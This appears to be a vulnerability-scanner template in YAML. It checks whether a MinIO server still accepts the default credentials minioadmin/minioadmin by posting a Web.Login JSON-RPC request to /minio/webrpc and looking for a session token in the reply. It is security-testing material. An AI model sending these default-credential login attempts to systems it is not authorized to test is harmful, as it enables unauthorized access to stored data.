id: minio-default-password

info:
    name: Minio Default Password
    author: harris2015
    severity: high
    reference:
        - https://docs.min.io/cn/

rules:
    poc10:
        request:
            method: POST
            path: /minio/webrpc
            headers:
                Content-Type: application/json
            body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
        expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token")
    poc20:
        request:
            method: POST
            path: /minio/webrpc
            headers:
                Content-Type: application/json
            body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
        expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token")
expression: poc10() || poc20()
